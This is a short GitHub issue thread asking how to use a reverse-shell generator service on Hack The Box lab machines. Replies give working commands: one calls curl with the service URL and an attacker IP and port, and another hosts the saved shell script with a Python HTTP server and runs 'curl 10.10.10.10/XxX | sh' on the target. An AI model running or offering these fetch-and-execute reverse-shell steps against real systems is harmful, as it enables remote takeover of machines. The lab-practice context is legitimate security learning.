Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

how can i use this in HACK THE BOX machines ? #26

Open
francoataffarel opened this issue Jan 17, 2021 · 2 comments
Open

how can i use this in HACK THE BOX machines ? #26

francoataffarel opened this issue Jan 17, 2021 · 2 comments

Comments

@francoataffarel
Copy link

Hello sir, can u help me, how can i use this in HACK THE BOX machines ?

@m4gic-sh
Copy link

Same procedure, just put the tunnel vpn to your connection.
like:
$ifconfig tun0
curl https://reverse-shell.sh/ IPFROMTUN0 :port

hope helps!

cheers!

@akr3ch
Copy link

akr3ch commented Mar 25, 2022

Hello sir, can u help me, how can i use this in HACK THE BOX machines ?

I think you asked the question, because those boxes doesn't have internet access...
So, in this case...you have to keep a copy of that file

curl https://reverse-shell.sh/10.10.10.10:1337 > XxX

now you need to host that file on your attacker machine and request it from the victim machine...
Like this-

root@kali:~# python3 -m http.server 80

target

curl 10.10.10.10/XxX | sh

I hope that make sense 👀

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants